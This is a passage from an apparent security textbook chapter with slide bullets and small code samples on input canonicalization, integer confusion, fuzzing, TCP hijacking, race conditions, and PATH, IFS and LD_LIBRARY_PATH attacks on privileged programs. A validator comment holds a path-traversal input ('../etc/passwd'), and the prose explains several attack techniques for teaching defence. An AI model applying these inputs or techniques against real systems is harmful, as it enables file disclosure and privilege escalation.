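    # accented letters) with one standard form before any comparison.
    return unicodedata.normalize("NFC", text)

def check_local_filename(name: str) -> str:
    name = canonical(name)
    # The check runs on the canonical form, so alternate encodings of
    # "/" or ".." cannot slip past it.
    if name.startswith("/") or ".." in name:
        raise ValueError("absolute path or parent reference rejected")
    return name

print(check_local_filename("notes.txt"))   # accepted
# check_local_filename("../etc/passwd")    raises ValueError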

May have multiple means of encoding text

Growing requirement to support users around the globe and to interact with them using their own languages

Unicode used for internationalization

Uses 16-bit value for characters

UTF-8 encodes as 1-4 byte sequences

Many Unicode decoders accept any valid equivalent sequence

Canonicalization

Transforming input data into a single, standard, minimal representation

Once this is done the input data can be compared with a single representation of acceptable input values

Validating Numeric Input

Additional concern when input data represents numeric values

Internally stored in fixed sized value

8, 16, 32, 64-bit integers

Floating point numbers depend on the processor used

Values may be signed or unsigned

Must correctly interpret text form and process consistently

Issues arise when comparing signed and unsigned values

Could be used to thwart buffer overflow check

22

There is an additional concern when the input data represents a numeric value. Such values are represented on a computer by a fixed size value. Integers are commonly 8, 16, 32, and now 64 bits in size. Floating-point numbers may be 32, 64, 96, or other numbers of bits, depending on the computer processor used. These values may also be signed or unsigned. When the input data are interpreted, the various representations of numeric values, including optional sign, leading zeroes, decimal values, and power values, must be handled appropriately. The subsequent use of numeric values must also be monitored. Problems particularly occur when a value of one size or form is cast to another. For example, a buffer size may be read as an unsigned integer. It may later be compared with the acceptable maximum buffer size. Depending on the language used, the size value that was input as unsigned may subsequently be treated as a signed value in some comparison. This leads to a vulnerability because negative values have the top bit set. This is the same bit pattern used by large positive values in unsigned integers. So the attacker could specify a very large actual input data length, which is treated as a negative number when compared with the maximum buffer size. Being a negative number, it clearly satisfies a comparison with a smaller, positive buffer size. However, when used, the actual data are much larger than the buffer allows, and an overflow occurs as a consequence of incorrect handling of the input size data. Once again, care is needed to check assumptions about data values and to ensure that all use is consistent with these assumptions.
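The signed/unsigned confusion can be demonstrated in Python using the struct module to mimic a 32-bit C cast; the buffer-limit value is illustrative.

import struct

MAX_BUFFER = 1024   # illustrative buffer limit

def c_int_cast(unsigned_value: int) -> int:
    # Reinterpret a 32-bit unsigned value as signed, as a careless C
    # comparison would.
    return struct.unpack("!i", struct.pack("!I", unsigned_value))[0]

attacker_len = 0xFFFFFF00            # huge unsigned length from input
as_signed = c_int_cast(attacker_len)
print(as_signed)                     # -256: the top bit makes it negative
print(as_signed < MAX_BUFFER)        # True: the check "passes", yet
                                     # 4294967040 bytes of data follow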

Input Fuzzing

23

Clearly, there is a problem anticipating and testing for all potential types of nonstandard inputs that might be exploited by an attacker to subvert a program. A powerful, alternative approach called fuzzing was developed by Professor Barton Miller at the University of Wisconsin Madison in 1989. This is a software testing technique that uses randomly generated data as inputs to a program. The range of inputs that may be explored is very large. They include direct textual or graphic input to a program, random network requests directed at a Web or other distributed service, or random parameter values passed to standard library or system functions. The intent is to determine whether the program or function correctly handles all such abnormal inputs or whether it crashes or otherwise fails to respond appropriately. In the latter cases the program or function clearly has a bug that needs to be corrected. The major advantage of fuzzing is its simplicity and its freedom from assumptions about the expected input to any program, service, or function. The cost of generating large numbers of tests is very low. Further, such testing assists in identifying reliability as well as security deficiencies in programs.

While the input can be completely randomly generated, it may also be randomly generated according to some template. Such templates are designed to examine likely scenarios for bugs. This might include excessively long inputs or textual inputs that contain no spaces or other word boundaries, for example. When used with network protocols, a template might specifically target critical aspects of the protocol. The intent of using such templates is to increase the likelihood of locating bugs. The disadvantage is that the templates incorporate assumptions about the input. Hence bugs triggered by other forms of input would be missed. This suggests that a combination of these approaches is needed for a reasonably comprehensive coverage of the inputs.

Professor Miller’s team has applied fuzzing tests to a number of common operating systems and applications. These include common command-line and GUI applications running on Linux, Windows NT, and, most recently, Mac OS X. The results of the latest tests are summarized in [MILL07], which identifies a number of programs with bugs in these various systems. Other organizations have used these tests on a variety of systems and software.

While fuzzing is a conceptually very simple testing method, it does have its limitations. In general, fuzzing only identifies simple types of faults with handling of input. If a bug exists that is only triggered by a small number of very specific input values, fuzzing is unlikely to locate it. However, the types of bugs it does locate are very often serious and potentially exploitable. Hence it ought to be deployed as a component of any reasonably comprehensive testing strategy.

A number of tools to perform fuzzing tests are now available and are used by organizations and individuals to evaluate security of programs and applications. They include the ability to fuzz command-line arguments, environment variables, Web applications, file formats, network protocols, and various forms of interprocess communications. A number of suitable black box test tools, including fuzzing tests, are described in [MIRA05]. Such tools are being used by organizations to improve the security of their software. Fuzzing is also used by attackers to identify potentially useful bugs in commonly deployed software. Hence it is becoming increasingly important for developers and maintainers to also use this technique to locate and correct such bugs before they are found and exploited by attackers.
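The core idea is compact enough to sketch. Below is a minimal random fuzzing harness in Python; `target` stands in for whatever parser or function is under test, and the trial counts are illustrative.

import random

def fuzz(target, trials: int = 10_000, max_len: int = 4096):
    # Feed purely random byte strings to the target and record anything
    # that crashes; a template-based fuzzer would instead mutate
    # structured inputs likely to expose bugs.
    failures = []
    for _ in range(trials):
        data = bytes(random.randrange(256)
                     for _ in range(random.randrange(max_len)))
        try:
            target(data)
        except Exception as exc:   # any unhandled crash is a bug worth noting
            failures.append((data, exc))
    return failures

# Usage sketch: fuzz(my_parser) returns the crashing inputs for triage.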

Developed by Professor Barton Miller at the University of Wisconsin Madison in 1989

Software testing technique that uses randomly generated data as inputs to a program

Range of inputs is very large

Intent is to determine if the program or function correctly handles abnormal inputs

Simple, free of assumptions, cheap

Assists with reliability as well as security

Can also use templates to generate classes of known problem inputs

Disadvantage is that bugs triggered by other forms of input would be missed

Combination of approaches is needed for reasonably comprehensive coverage of the inputs

Writing Safe Program Code

Second component is processing of data by some algorithm to solve required problem

High-level languages are typically compiled and linked into machine code which is then directly executed by the target processor

24

The second component of our model of computer programs is the processing of the input data according to some algorithm. For procedural languages like C and its descendants, this algorithm specifies the series of steps taken to manipulate the input to solve the required problem. High-level languages are typically compiled and linked into machine code, which is then directly executed by the target processor. In Section 10.1 we discuss the typical process structure used by executing programs. Alternatively, a high-level language such as Java may be compiled into an intermediate language that is then interpreted by a suitable program on the target system. The same may be done for programs written using an interpreted scripting language. In all cases the execution of a program involves the execution of machine language instructions by a processor to implement the desired algorithm. These instructions will manipulate data stored in various regions of memory and in the processor’s registers.

From a software security perspective, the key issues are whether the implemented algorithm correctly solves the specified problem, whether the machine instructions executed correctly represent the high-level algorithm specification, and whether the manipulation of data values in variables, as stored in machine registers or memory, is valid and meaningful.

Security issues:

Correct algorithm implementation

Correct machine instructions for algorithm

Valid manipulation of data

Correct Algorithm Implementation

25

The first issue is primarily one of good program development technique. The algorithm may not correctly implement all cases or variants of the problem. This might allow some seemingly legitimate program input to trigger program behavior that was not intended, providing an attacker with additional capabilities. While this may be an issue of inappropriate interpretation or handling of program input, as we discuss in Section 11.2, it may also be inappropriate handling of what should be valid input. The consequence of such a deficiency in the design or implementation of the algorithm is a bug in the resulting program that could be exploited.

A good example of this was the bug in some early releases of the Netscape Web browser. Their implementation of the random number generator used to generate session keys for secure Web connections was inadequate [GOWA01]. The assumption was that these numbers should be unguessable, short of trying all alternatives. However, due to a poor choice of the information used to seed this algorithm, the resulting numbers were relatively easy to predict. As a consequence, it was possible for an attacker to guess the key used and then decrypt the data exchanged over a secure Web session. This flaw was fixed by reimplementing the random number generator to ensure that it was seeded with sufficient unpredictable information that it was not possible for an attacker to guess its output.
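A sketch in Python contrasting predictable and unpredictable key generation; the Netscape flaw was in seeding, not in the generator algorithm itself, and the key sizes here are illustrative.

import random
import secrets
import time

# Weak: seeded from the clock, so an attacker who can estimate the time
# of generation can reproduce the whole sequence, much as with the early
# Netscape browser's poorly seeded generator.
rng = random.Random(int(time.time()))
weak_key = rng.getrandbits(128)

# Strong: drawn from the operating system's entropy source, designed to
# be unguessable short of trying all alternatives.
strong_key = secrets.token_bytes(16)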

Another well-known example is the TCP session spoof or hijack attack. This extends the concept we discussed in Section 7.1 of sending source spoofed packets to a TCP server. In this attack, the goal is not to leave the server with half-open connections, but rather to fool it into accepting packets using a spoofed source address that belongs to a trusted host but actually originates on the attacker’s system. If the attack succeeded, the server could be convinced to run commands or provide access to data allowed for a trusted peer, but not generally. To understand the requirements for this attack, consider the TCP three-way connection handshake illustrated in Figure 7.2. Recall that because a spoofed source address is used, the response from the server will not be seen by the attacker, who will not therefore know the initial sequence number provided by the server. However, if the attacker can correctly guess this number, a suitable ACK packet can be constructed and sent to the server, which then assumes that the connection is established. Any subsequent data packet is treated by the server as coming from the trusted source, with the rights assigned to it. The hijack variant of this attack waits until some authorized external user connects and logs in to the server. Then the attacker attempts to guess the sequence numbers used and to inject packets with spoofed details to mimic the next packets the server expects to see from the authorized user. If the attacker guesses correctly, then the server responds to any requests using the access rights and permissions of the authorized user. There is an additional complexity to these attacks. Any responses from the server are sent to the system whose address is being spoofed. Because they acknowledge packets this system has not sent, the system will assume there is a network error and send a reset (RST) packet to terminate the connection. The attacker must ensure that the attack packets reach the server and are processed before this can occur. This may be achieved by launching a denial-of-service attack on the spoofed system while simultaneously attacking the target server.

The implementation flaw that permits these attacks is that the initial sequence

numbers used by many TCP/IP implementations are far too predictable. In addition,

the sequence number is used to identify all packets belonging to a particular session.

The TCP standard specifies that a new, different sequence number should be used

for each connection so that packets from previous connections can be distinguished.

Potentially this could be a random number (subject to certain constraints). However,

many implementations used a highly predictable algorithm to generate the next initial

sequence number. The combination of the implied use of the sequence number as an

identifier and authenticator of packets belonging to a specific TCP session and the

failure to make them sufficiently unpredictable enables the attack to occur. A number

of recent operating system releases now support truly randomized initial sequence

numbers. Such systems are immune to these types of attacks.
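The following minimal C sketch contrasts the two approaches (the functions are hypothetical stand-ins; real TCP stacks generate initial sequence numbers in the kernel):

#include <stdint.h>
#include <stdio.h>

static uint32_t last_isn = 0;

/* Predictable: stepping by a constant per connection means one
 * observed ISN lets an attacker guess all subsequent ones. */
uint32_t predictable_isn(void)
{
    last_isn += 64000;
    return last_isn;
}

/* Unpredictable: draw the ISN from the system entropy source
 * (in practice subject to constraints the TCP standard imposes). */
uint32_t random_isn(void)
{
    uint32_t isn = 0;
    FILE *f = fopen("/dev/urandom", "rb");
    if (f != NULL) {
        if (fread(&isn, sizeof isn, 1, f) != 1)
            isn = 0;   /* error path; a real implementation must handle this */
        fclose(f);
    }
    return isn;
}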

Another variant of this issue is when the programmers deliberately include

additional code in a program to help test and debug it. While this is valid during

program development, all too often this code remains in production releases of a

program. At the very least, this code could inappropriately release information to a

user of the program. At worst, it may permit a user to bypass security checks or other

program limitations and perform actions they would not otherwise be allowed to

perform. This type of vulnerability was seen in the sendmail mail delivery program

in the late 1980s and famously exploited by the Morris Internet Worm. The implementers

of sendmail had left in support for a DEBUG command that allowed the

user to remotely query and control the running program [SPAF89]. The Worm used

this feature to infect systems running versions of sendmail with this vulnerability.

The problem was aggravated because the sendmail program ran using superuser

privileges and hence had unlimited access to change the system. We discuss the issue

of minimizing privileges further in Section 11.4 .

A further example concerns the implementation of an interpreter for a high- or intermediate-level language. The assumption is that the interpreter correctly

implements the specified program code. Failure to adequately reflect the language

semantics could result in bugs that an attacker might exploit. This was clearly seen

when some early implementations of the Java Virtual Machine (JVM) inadequately

implemented the security checks specified for remotely sourced code, such as in

applets [DEFW96]. These implementations permitted an attacker to introduce code remotely, such as on a Web page, and trick the JVM interpreter into treating it as locally sourced and hence trusted code with much greater access to the local system and data.

 These examples illustrate the care that is needed when designing and implementing

a program. It is important to specify assumptions carefully, such as that generated random numbers should indeed be unpredictable, in order to ensure that these assumptions are satisfied by the resulting program code. Traditionally these specifications

and checks are handled informally, as design goals and code comments. An

alternative is the use of formal methods in software development and analysis that

ensures the software is correct by construction. Such approaches have been known

for many years, but have also been considered too complex and difficult for general

use. One area where they have been used is in the development of trusted computing

systems, as we will discuss in Chapter 27. However, NISTIR 8151 notes that this

is changing, and encourages their further development and more widespread use. It

is also very important to identify debugging and testing extensions to the program

and to ensure that they are removed or disabled before the program is distributed

and used.

Issue of good program development technique

Algorithm may not correctly handle all problem variants

Consequence of deficiency is a bug in the resulting program that could be exploited

Initial sequence numbers used by many TCP/IP implementations are too predictable

Combination of the sequence number as an identifier and authenticator of packets and the failure to make them sufficiently unpredictable enables the attack to occur

Another variant is when the programmers deliberately include additional code in a program to help test and debug it

Often code remains in production release of a program and could inappropriately release information

May permit a user to bypass security checks and perform actions they would not otherwise be allowed to perform

This vulnerability was exploited by the Morris Internet Worm

Ensuring Machine Language Corresponds to Algorithm

Issue is ignored by most programmers

Assumption is that the compiler or interpreter generates or executes code that validly implements the language statements

Requires comparing machine code with original source

Slow and difficult

Development of computer systems with very high assurance level is the one area where this level of checking is required

Specifically Common Criteria assurance level of EAL 7

26

The second issue concerns the correspondence between the algorithm specified in

some programming language and the machine instructions that are run to implement

it. This issue is one that is largely ignored by most programmers. The assumption

is that the compiler or interpreter does indeed generate or execute code that

validly implements the language statements. When this is considered, the issue is

typically one of efficiency, usually addressed by specifying the required level of

optimization flags to the compiler.

With compiled languages, as Ken Thompson famously noted in [THOM84], a

malicious compiler programmer could include instructions in the compiler to emit

additional code when some specific input statements were processed. These statements

could even include part of the compiler, so that these changes could be reinserted

when the compiler source code was compiled, even after all trace of them

had been removed from the compiler source. If this were done, the only evidence

of these changes would be found in the machine code. Locating this would require

careful comparison of the generated machine code with the original source. For

large programs, with many source files, this would be an exceedingly slow and difficult

task, one that, in general, is very unlikely to be done.

The development of trusted computer systems with very high assurance level

is the one area where this level of checking is required. Specifically, certification

of computer systems using a Common Criteria assurance level of EAL 7 requires

validation of the correspondence among design, source code, and object code. We

discuss this further in Chapter 27.

Correct Data Interpretation

Data stored as bits/bytes in computer

Grouped as words or longwords

Accessed and manipulated in memory or copied into processor registers before being used

Interpretation depends on machine instruction executed

Different languages provide different capabilities for restricting and validating interpretation of data in variables

Strongly typed languages are more limited, safer

Other languages allow more liberal interpretation of data and permit program code to explicitly change their interpretation

27

The next issue concerns the correct interpretation of data values. At the most basic

level, all data on a computer are stored as groups of binary bits. These are generally

saved in bytes of memory, which may be grouped together as a larger unit, such as a

word or longword value. They may be accessed and manipulated in memory, or they

may be copied into processor registers before being used.  Whether a particular group

of bits is interpreted as representing a character, an integer, a floating-point number,

a memory address (pointer), or some more complex interpretation depends on the

program operations used to manipulate it and ultimately on the specific machine

instructions executed. Different languages provide varying capabilities for restricting

and validating assumptions on the interpretation of data in variables. If the language

includes strong typing, then the operations performed on any specific type of data

will be limited to appropriate manipulations of the values.  This greatly reduces the

likelihood of inappropriate manipulation and use of variables introducing a flaw in

the program. Other languages, though, allow a much more liberal interpretation of

data and permit program code to explicitly change their interpretation. The widely

used language C has this characteristic, as we discussed in Chapter 10. In particular,

it allows easy conversion between interpreting variables as integers and interpreting

them as memory addresses (pointers). This is a consequence of the close relationship

between C language constructs and the capabilities of machine language instructions,

and it provides significant benefits for system level programming. Unfortunately, it

also allows a number of errors caused by the inappropriate manipulation and use of

pointers. The prevalence of buffer overflow issues, as we discussed in Chapter 10, is

one consequence. A related issue is the occurrence of errors due to the incorrect

manipulation of pointers in complex data structures, such as linked lists or trees,

resulting in corruption of the structure or changing of incorrect data values. Any such

programming bugs could provide a means for an attacker to subvert the correct

operation of a program or simply to cause it to crash.
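A minimal C sketch (values purely illustrative) shows how easily the language permits reinterpreting an integer as a pointer, silently aliasing and corrupting data:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
    int secret = 42;
    uintptr_t addr = (uintptr_t)&secret;   /* pointer -> integer */
    int *p = (int *)addr;                  /* integer -> pointer again */
    *p = 0;                                /* silently modifies 'secret' */

    /* Arithmetic on the integer form can stray outside the object;
     * dereferencing such a pointer is undefined behavior. */
    int *stray = (int *)(addr + sizeof(int));
    (void)stray;

    printf("secret is now %d\n", secret);
    return 0;
}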

The best defense against such errors is to use a strongly typed programming

language. However, even when the main program is written in such a language,

it will still access and use operating system services and standard library routines,

which are currently most likely written in languages like C, and could potentially

contain such flaws. The only counter to this is to monitor any bug reports for the

system being used and to try and not use any routines with known, serious bugs. If a

loosely typed language like C is used, then due care is needed whenever values are

cast between data types to ensure that their use remains valid.

Correct Use of Memory

Issue of dynamic memory allocation

Used to manipulate unknown amounts of data

Allocated when needed, released when done

Memory leak

Steady reduction in memory available on the heap to the point where it is completely exhausted

Many older languages have no explicit support for dynamic memory allocation

Use standard library routines to allocate and release memory

Modern languages handle automatically

28

Related to the issue of interpretation of data values is the allocation and management

of dynamic memory storage, generally using the process heap. Many

programs, which manipulate unknown quantities of data, use dynamically allocated

memory to store data when required. This memory must be allocated when needed

and released when done. If a program fails to correctly manage this process, the

consequence may be a steady reduction in memory available on the heap to the

point where it is completely exhausted. This is known as a memory leak , and often

the program will crash once the available memory on the heap is exhausted. This

provides an obvious mechanism for an attacker to implement a denial-of-service

attack on such a program.

Many older languages, including C, provide no explicit support for dynamically

allocated memory. Instead support is provided by explicitly calling standard

library routines to allocate and release memory. Unfortunately, in large, complex

programs, determining exactly when dynamically allocated memory is no longer

required can be a difficult task. As a consequence, memory leaks in such programs

can easily occur and can be difficult to identify and correct. There are library

variants that implement much higher levels of checking and debugging such allocations

that can be used to assist this process.
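A minimal C sketch (the processing function and its rejection rule are hypothetical) shows how a leak typically arises in an error path, and the corrected version with a single release point:

#include <stdlib.h>
#include <string.h>

int process_leaky(const char *input)
{
    char *buf = malloc(strlen(input) + 1);
    if (buf == NULL)
        return -1;
    strcpy(buf, input);
    if (strchr(buf, ';') != NULL)
        return -1;          /* BUG: early return leaks 'buf' */
    free(buf);
    return 0;
}

int process_fixed(const char *input)
{
    int rc = 0;
    char *buf = malloc(strlen(input) + 1);
    if (buf == NULL)
        return -1;
    strcpy(buf, input);
    if (strchr(buf, ';') != NULL)
        rc = -1;            /* fall through to the single free() */
    free(buf);              /* every path releases the memory */
    return rc;
}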

Other languages like Java and C++ manage memory allocation and release

automatically. While such languages do incur an execution overhead to support this

automatic management, the resulting programs are generally far more reliable. The

use of such languages is strongly encouraged to avoid memory management problems.

Race Conditions

Without synchronization of accesses it is possible that values may be corrupted or changes lost due to overlapping access, use, and replacement of shared values

Arise when writing concurrent code whose solution requires the correct selection and use of appropriate synchronization primitives

Deadlock

Processes or threads wait on a resource held by the other

One or more programs has to be terminated

29

Another topic of concern is management of access to common, shared memory by

several processes or threads within a process. Without suitable synchronization of

accesses, it is possible that values may be corrupted, or changes lost, due to overlapping

access, use, and replacement of shared values. The resulting race condition

occurs when multiple processes and threads compete to gain uncontrolled access

to some resource. This problem is a well-known and documented issue that arises

when writing concurrent code, whose solution requires the correct selection and

use of appropriate synchronization primitives. Even so, it is neither easy nor obvious

what the most appropriate and efficient choice is. If an incorrect sequence

of synchronization primitives is chosen, it is possible for the various processes or

threads to deadlock , each waiting on a resource held by the other. There is no easy

way of recovering from this flaw without terminating one or more of the programs.

An attacker could trigger such a deadlock in a vulnerable program to implement a

denial-of-service upon it. In large complex applications, ensuring that deadlocks are

not possible can be very difficult. Care is needed to carefully design and partition

the problem to limit areas where access to shared memory is needed and to determine

the best primitives to use.
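A minimal POSIX threads sketch in C (counts and names are illustrative) demonstrates both the race and its repair; removing the two locking calls makes the final total unpredictable:

#include <pthread.h>
#include <stdio.h>

static long counter = 0;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static void *worker(void *arg)
{
    (void)arg;
    for (int i = 0; i < 100000; i++) {
        pthread_mutex_lock(&lock);     /* serialize the read-modify-write */
        counter++;
        pthread_mutex_unlock(&lock);
    }
    return NULL;
}

int main(void)
{
    pthread_t t1, t2;
    pthread_create(&t1, NULL, worker, NULL);
    pthread_create(&t2, NULL, worker, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    printf("counter = %ld\n", counter);  /* 200000 only with the mutex */
    return 0;
}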

Operating System Interaction

30

The third component of our model of computer programs is that it executes on a

computer system under the control of an operating system. This aspect of a computer

program is often not emphasized in introductory programming courses; however,

from the perspective of writing secure software, it is critical. Excepting dedicated

embedded applications, in general, programs do not run in isolation on most

computer systems. Rather, they run under the control of an operating system that

mediates access to the resources of that system and shares their use between all the

currently executing programs.

The operating system constructs an execution environment for a process when

a program is run, as illustrated in Figure 10.4 . In addition to the code and data for

the program, the process includes information provided by the operating system.

These include environment variables, which may be used to tailor the operation of

the program, and any command-line arguments specified for the program. All such

data should be considered external inputs to the program whose values need validation before use, as we discuss in Section 11.2.

Generally these systems have a concept of multiple users on the system.

Resources, like files and devices, are owned by a user and have permissions granting

access with various rights to different categories of users. We discussed these concepts

in detail in Chapter 4. From the perspective of software security, programs need

access to the various resources, such as files and devices, they use. Unless appropriate

access is granted, these programs will likely fail. However, excessive levels of access

are also dangerous because any bug in the program could then potentially compromise

more of the system.

There are also concerns when multiple programs access shared resources, such

as a common file. This is a generalization of the problem of managing access to shared

memory, which we discussed in Section 11.3. Many of the same concerns apply, and

appropriate synchronization mechanisms are needed.

Programs execute on systems under the control of an operating system

Mediates and shares access to resources

Constructs execution environment

Includes environment variables and arguments

Systems have a concept of multiple users

Resources are owned by a user and have permissions granting access with various rights to different categories of users

Programs need access to various resources; however, excessive levels of access are dangerous

Concerns when multiple programs access shared resources such as a common file

Environment Variables

31

Environment variables are a collection of string values inherited by each process

from its parent that can affect the way a running process behaves. The operating system

includes these in the process’s memory when it is constructed. By default, they

are a copy of the parent’s environment variables. However, the request to execute a

new program can specify a new collection of values to use instead. A program can

modify the environment variables in its process at any time, and these in turn will be

passed to its children. Some environment variable names are well known and used

by many programs and the operating system. Others may be custom to a specific

program. Environment variables are used on a wide variety of operating systems,

including all UNIX variants, DOS and Microsoft Windows systems, and others.

Well-known environment variables include the variable PATH, which specifies

the set of directories to search for any given command; IFS, which specifies the

word boundaries in a shell script; and LD_LIBRARY_PATH, which specifies the list of

directories to search for dynamically loadable libraries. All of these have been used

to attack programs.

The security concern for a program is that these provide another path for

untrusted data to enter a program and hence need to be validated. The most common

use of these variables in an attack is by a local user on some system attempting

to gain increased privileges on the system. The goal is to subvert a program that

grants superuser or administrator privileges, coercing it to run code of the attacker’s

selection with these higher privileges.
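As a small illustration of treating environment variables as untrusted input, the following C sketch validates a hypothetical custom variable (MYAPP_LANG) before use:

#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Accept only short, purely alphabetic values such as "en" or "de";
 * anything else falls back to a safe default. */
const char *get_language(void)
{
    const char *val = getenv("MYAPP_LANG");
    if (val == NULL || strlen(val) > 8)
        return "en";
    for (const char *p = val; *p; p++)
        if (!isalpha((unsigned char)*p))
            return "en";
    return val;
}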

Collection of string values inherited by each process from its parent

Can affect the way a running process behaves

Included in memory when it is constructed

Can be modified by the program process at any time

Modifications will be passed to its children

Another source of untrusted program input

Most common use is by a local user attempting to gain increased privileges

Goal is to subvert a program that grants superuser or administrator privileges

32

Some of the earliest attacks using environment variables targeted shell scripts

that executed with the privileges of their owner rather than the user running them.

Consider the simple example script shown in Figure 11.6a . This script, which might

be used by an ISP, takes the identity of some user, strips any domain specification if

included, and then retrieves the mapping for that user to an IP address. Because that

information is held in a directory of privileged user accounting information, general

access to that directory is not granted. Instead the script is run with the privileges

of its owner, which does have access to the relevant directory. This type of simple

utility script is very common on many systems. However, it contains a number of

serious flaws. The first concerns the interaction with the PATH environment variable.

This simple script calls two separate programs: sed and grep. The programmer

assumes that the standard system versions of these programs will be called. But

they are specified just by their filename. To locate the actual program, the shell will

search each directory named in the PATH variable for a file with the desired name.

The attacker simply has to redefine the PATH variable to include a directory they

control, which contains a program called grep, for example. Then when this script

is run, the attacker’s grep program is called instead of the standard system version.

This program can do whatever the attacker desires, with the privileges granted to the

shell script. To address this vulnerability the script could be rewritten to use absolute

names for each program. This avoids the use of the PATH variable, though at a cost

in readability and portability. Alternatively, the PATH variable could be reset to a

known default value by the script, as shown in Figure 11.6b . Unfortunately, this version

of the script is still vulnerable, this time due to the IFS variable. This is used

to separate the words that form a line of commands. It defaults to a space, tab, or

newline character. However, it can be set to any sequence of characters. Consider

the effect of including the “=” character in this set. Then the assignment of a new

value to the PATH variable is interpreted as a command to execute the program

PATH with the list of directories as its argument. If the attacker has also changed the

PATH variable to include a directory with an attack program PATH, then this will be

executed when the script is run. It is essentially impossible to prevent this form of

attack on a shell script. In the worst case, if the script executes as the root user, then

total compromise of the system is possible. Some recent UNIX systems do block

the setting of critical environment variables such as these for programs executing as

root. However, that does not prevent attacks on programs running as other users,

possibly with greater access to the system.

It is generally recognized that writing secure, privileged shell scripts is very

difficult. Hence their use is strongly discouraged. At best, the recommendation is

to change only the group, rather than user, identity and to reset all critical environment

variables. This at least ensures the attack cannot gain superuser privileges.

If a scripted application is needed, the best solution is to use a compiled wrapper

program to call it. The change of owner or group is done using the compiled

program, which then constructs a suitably safe set of environment variables before

calling the desired script. Correctly implemented, this provides a safe mechanism

for executing such scripts. A very good example of this approach is the use of the

suexec wrapper program by the Apache Web server to execute user CGI scripts.

The wrapper program performs a rigorous set of security checks before constructing

a safe environment and running the specified script.
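A minimal C sketch of such a wrapper (the paths, script name, and environment values are illustrative assumptions; a production wrapper such as suexec performs many more checks) discards the caller's environment entirely before running the script:

#include <stdio.h>
#include <unistd.h>

int main(void)
{
    /* A fresh, minimal environment: no attacker-controlled PATH or IFS. */
    char *safe_env[] = {
        "PATH=/bin:/usr/bin",
        "IFS= \t\n",
        NULL
    };
    char *script_argv[] = { "/usr/local/lib/myapp/lookup.sh", NULL };

    execve(script_argv[0], script_argv, safe_env);  /* replaces this process */
    perror("execve");                               /* reached only on failure */
    return 1;
}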

Vulnerable Compiled Programs

33

Even if a compiled program is run with elevated privileges, it may still be

vulnerable to attacks using environment variables. If this program executes another

program, depending on the command used to do this, the PATH variable may still

be used to locate it. Hence any such program must reset this to known safe values

first. This at least can be done securely. However, there are other vulnerabilities.

Essentially all programs on modern computer systems use functionality provided

by standard library routines. When the program is compiled and linked, the code

for these standard libraries could be included in the executable program file. This

is known as a static link. With the use of static links every program loads its own

copy of these standard libraries into the computer’s memory. This is wasteful, as

all these copies of code are identical. Hence most modern systems support the

concept of dynamic linking. A dynamically linked executable program does not

include the code for common libraries, but rather has a table of names and pointers

to all the functions it needs to use. When the program is loaded into a process, this

table is resolved to reference a single copy of any library, shared by all processes

needing it on the system. However, there are reasons why different programs may

need different versions of libraries with the same name. Hence there is usually

a way to specify a list of directories to search for dynamically loaded libraries.

On many UNIX systems this is the LD_LIBRARY_PATH environment variable. Its

use does provide a degree of flexibility with dynamic libraries. But again it also

introduces a possible mechanism for attack. The attacker constructs a custom version

of a common library, placing the desired attack code in a function known

to be used by some target, dynamically linked program. Then by setting the

LD_LIBRARY_PATH variable to reference the attacker’s copy of the library first,

when the target program is run and calls the known function, the attacker’s code is

run with the privileges of the target program. To prevent this type of attack, a statically

linked executable can be used, at a cost of memory efficiency. Alternatively,

again some modern operating systems block the use of this environment variable

when the program executed runs with different privileges.

 Lastly, apart from the standard environment variables, many programs use

custom variables to permit users to generically change their behavior just by setting

appropriate values for these variables in their startup scripts. Again, such use means

these variables constitute untrusted input to the program that needs to be validated.

One particular danger is to merge values from such a variable with other information

into some buffer. Unless due care is taken, a buffer overflow can occur, with

consequences as we discussed in Chapter 10. Alternatively, any of the issues with

correct interpretation of textual information we discussed in Section

11.2 could also apply.
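A short C sketch of this danger (MYAPP_HOME is a hypothetical custom variable) shows the bounded alternative to an unchecked copy:

#include <stdio.h>
#include <stdlib.h>

void build_path(char *out, size_t outlen)
{
    const char *home = getenv("MYAPP_HOME");
    if (home == NULL)
        home = "/var/lib/myapp";

    /* Unsafe: sprintf(out, "%s/config", home) overflows 'out' when an
     * attacker supplies a long MYAPP_HOME. Bounded formatting cannot. */
    snprintf(out, outlen, "%s/config", home);
}

int main(void)
{
    char path[256];
    build_path(path, sizeof path);
    printf("%s\n", path);
    return 0;
}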

All of these examples illustrate how care is needed to identify the way in which

a program interacts with the system in which it executes and to carefully consider

the security implications of these assumptions.

Programs can be vulnerable to PATH variable manipulation

Must reset to “safe” values

If dynamically linked may be vulnerable to manipulation of LD_LIBRARY_PATH

Used to locate suitable dynamic library

Must either statically link privileged programs or prevent use of this variable

Use of Least Privilege

34

The consequence of many of the program flaws we discuss in both this chapter and

Chapter 10 is that the attacker is able to execute code with the privileges and access

rights of the compromised program or service. If these privileges are greater than

those available already to the attacker, then this results in a privilege escalation , an

important stage in the overall attack process. Using the higher levels of privilege

may enable the attacker to make changes to the system, ensuring future use of these

greater capabilities. This strongly suggests that programs should execute with the

least amount of privileges needed to complete their function. This is known as the

principle of least privilege and is widely recognized as a desirable characteristic in a

secure program.

Normally when a user runs a program, it executes with the same privileges and

access rights as that user. Exploiting flaws in such a program does not benefit an

attacker in relation to privileges, although the attacker may have other goals, such as

a denial-of-service attack on the program. However, there are many circumstances

when a program needs to utilize resources to which the user is not normally granted

access. This may be to provide a finer granularity of access control than the standard

system mechanisms support. A common practice is to use a special system login for

a service and make all files and directories used by the service accessible only to that

login. Any program used to implement the service runs using the access rights of this

system user and is regarded as a privileged program. Different operating systems

provide different mechanisms to support this concept. UNIX systems use the set

user or set group options. The access control lists used in Windows systems provide a

means to specify alternate owner or group access rights if desired. We discussed such

access control concepts in detail in Chapter 4.

Whenever a privileged program runs, care must be taken to determine the

appropriate user and group privileges required. Any such program is a potential

target for an attacker to acquire additional privileges, as we noted in the discussion

of concerns regarding environment variables and privileged shell scripts. One key

decision involves whether to grant additional user or just group privileges. Where

appropriate the latter is generally preferred. This is because on UNIX and related

systems, any file created will have the user running the program as the file’s owner,

enabling users to be more easily identified. If additional special user privileges

are granted, this special user is the owner of any new files, masking the identity of

the user running the program. However, there are circumstances when providing

privileged group access is not sufficient. In those cases care is needed to manage,

and log if necessary, use of these programs.

Another concern is ensuring that any privileged program can modify only those

files and directories necessary. A common deficiency found with many privileged

programs is for them to have ownership of all associated files and directories. If the

